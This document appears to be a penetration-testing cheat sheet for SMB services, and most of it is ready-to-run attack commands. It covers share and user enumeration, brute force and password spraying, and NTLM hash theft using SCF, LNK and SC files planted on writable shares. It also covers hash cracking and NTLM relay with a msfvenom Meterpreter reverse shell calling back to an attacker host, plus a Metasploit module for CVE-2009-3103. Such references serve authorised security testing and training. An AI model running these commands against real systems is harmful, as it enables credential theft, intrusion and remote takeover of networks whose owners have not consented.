139,445 - SMB

CLI Tools

SMBMap

Shares & Perms

smbmap -H 10.10.10.10

Dirs

smbmap -H 10.10.10.10 -r share1

Download

smbmap -H 10.10.10.10 --download "share1\file1"

Upload

smbmap -H 10.10.10.10 --upload file1 "share1\file1"

SMBClient

Shares

smbclient -N -L //10.10.10.10

Connect

smbclient -U user //10.129.42.253/share1

Download All

smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

RPC

Connect

# NULL session
rpcclient -U "" -N 10.10.10.10

SysInfo

srvinfo

Users

enumdomusers

Groups

enumalsgroups

Domains

enumdomains

All

netshareenumall

Local Groups

enumalsgroups builtin

Privileges

enumprivs

SID

lookupnames user

User Info

queryuser RID

Pass Pol

getusrdompwinfo 1000

New User

# create user
createdomuser user1
# set new password
setuserinfo2 user1 24 'Pass123!'

New Share

netshareadd "C:\Windows" "Windows" 10 "Share1"

Change Pass

setuserinfo2 <USER> 23 'ComplexP4ssw0rd!'
# or
chgpasswd3 <USER> <OLD-PASS> <NEW-PASS>

Operations

NSEs

sudo nmap -sV -p 139,445 -script smb* 10.10.10.10

Mount

sudo mount -t cifs //10.10.10.10/target-share /mnt
sudo mount -t cifs - "username='',password=''" //10.10.10.10/target-share /mnt

Mount (auth)

sudo mount -t cifs -o username=<USER>,password=<PASS> //<TARGET-IP>/"<SHARE>" <PATH-TO-MOUNT>

List Dir Perms

smbcacls -N '//10.10.10.10/share1' /dir1

List Perms Recur

$ for i in $(ls); do echo $i; smbcacls -N '//10.10.10.103/share1' /dir1/$i ; done

1. Server

impacket-smbserver -smb2support share . -username test -password tes

2. Connect

net use x: \\10.10.14.4\share /USER:test test

3. Transfer

copy file1 x:\

Enumeration

Enum

# Enum4Linux
/opt/enum4linux-ng/enum4linux-ng.py 172.16.10.3 -A

# Impacket
/opt/impacket/examples/samrdump.py 172.16.10.3

Version

msf6 > use auxiliary/scanner/smb/smb_version

User Enum

msf6 > use auxiliary/scanner/smb/smb_login

Attacks

Passwords

Brute Force

# BFA with wordlists
hydra -L <user-list> -P <pass-list> smb://<target-ip>

# BFA a target user
hydra -l <username> -P <pass-list> smb://<target-ip>

Password Spray

We can password spray with nxc:

# Domain
nxc smb 172.16.10.3 -u <user-list> -p Password123! --continue-on-success

# Local
nxc smb 172.16.10.3 -u <user-list> -p Password123! --continue-on-success --local-auth

hydra defaults on attacking the domain. To force local authentication we must prepend the local machine name (e.g. DC01) or .\ to the username in our userlist. For instance, DC01\Administrator or .\Administrator.

# Domain
hydra -U <user-wordlist> -p <pass> smb://<target-ip>

Nmap Vuln Scan

sudo nmap -script=smb-vuln\* -p445 <target-IP>

Hashes

All described methods (SCF, LNK, SC) require WRITE access to a share/directory:

• If WRITE access to a share is available, NetExec modules can be used for automation.

• If WRITE access is only available within a READABLE share, the process must be done manually.

For stealing the hash, the user must only browse the share, not interact with the file.

Share permissions can be configured to only allow folders to be created, not files; nxc will flag WRITE access in those cases.

SCF

Requires WRITE access to the Users share!

The Shell Command File (SCF) is a Windows file format used to define simple Explorer shell commands — kind of like shortcuts, but more primitive (read more here).

# Create the SCF file
nxc smb <target-ip> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<smb-server-ip>

Monitor the traffic (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<smb-server-ip> CLEANUP=True

If a share is locally mounted and WRITE access is available for the SMB/Users/WritableDir folder, but not for the Users share, we can create an SCF file:

[Shell]
Command=2
IconFile=\\10.10.10.10\share\test.io
[Taskbar]
Command=ToggleDesktop

Listen:

sudo responder -I tun0

Transfer the SCF file to the writable directory:

sudo cp example.scf SMB/Users/WritableDir

LNK

A Link (LNK) file is a Windows shortcut file that points to another file, folder, or program. When opened, it tells Windows to launch the target it links to — but it can also include custom commands, making it useful for both legitimate use and malicious purposes like executing hidden payloads.

Upload a LNK file:

nxc smb <target-ip> -u <user> -p <pass> -M slinky -o SERVER=<smb-server-ip> NAME=README

Listen (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u <user> -p <pass> -M slinky -o NAME=README CLEANUP=YES

SC

A Service Configuration (SC) file is a plain text file used to create or configure Windows services. It defines parameters like the service name, executable path, and startup settings. This is similar to the LNK method, but the URL needs to be escaped with \\ and by default it writes the file Documents in all writable shares.

Upload a SC file:

nxc smb <target-ip> -u <user> -p <pass> -M drop-sc -o URL=\\\\<smb-server-ip>\\<share_name> SHARE=<share_name> FILENAME=README

Listen (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u <user> -p <pass> -M drop-sc -o CLEANUP=True FILENAME=README

nltm_theft

ntml_theft is a tool that generates 21 different types of hash theft documents, e.g. .scf or .lnk files.

# Create a LNK file
ntlm_theft.py -g lnk -s <attacker-ip> -f test

# Listen
sudo responder -I tun0

# Upload the file into a writable share
nxc smb <target-ip> -u <user> -p <pass> --share <share-name> --put-file test/test.lnk test.lnk

Once a hash is obtained it can be cracked or relayed.

Crack

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou

Relay

See below:NTLM Relay

NTLM Relay

Meterpreter

Relay for gaining RCE with a Meterpreter listener:

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Create a reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f exe > shell.exe

# Start the SMB server
sudo impacket-ntlmrelayx -tf relay.txt -e ./shell.exe

# Start the listener
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker-ip>; set
LPORT 4444; exploit -j"

# Migrate
meterpreter > ps
meterpreter > migrate <PID>

MSF-Based

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Use the MSF module to relay
$ sudo msfconsole -q -x "use exploit/windows/smb/smb_relay; set RELAY_TARGETS 172.16.10.0/14; set SRVHOST <attacker-ip>; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker-ip>; exploit -j"

Impacket

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Relay via Impacket's script
sudo impacket-ntlmrelayx -tf relay.txt -smb2support --no-http

Vulnerabilities

SMBv2 Negotiation

Windows Vista (Gold, SP1, SP2), Windows Server 2008 (Gold, SP2), and Windows 7 Release Candidate are affected by a RCE vulnerability (CVE-2009-3103), aka SMBv2 Negotiation Vulnerability, in the SMBv2 protocol implementation within srv2.sys, the kernel-mode driver responsible for SMBv2 handling in certain Microsoft Windows versions. A flaw in the processing of the Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet allows an attacker to trigger an array index error by supplying an ampersand (&) character. This malformed input leads to an out-of-bounds memory dereference in kernel space.

When exploited, it can result in either a denial of service through a system crash (blue screen) or, under certain conditions, arbitrary code execution with kernel-level privileges. The attack is conducted over TCP port 445 and does not require authentication, making it highly dangerous when SMBv2 services are exposed to untrusted networks.

A MSF module exists for exploiting the vulnerability.

 msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index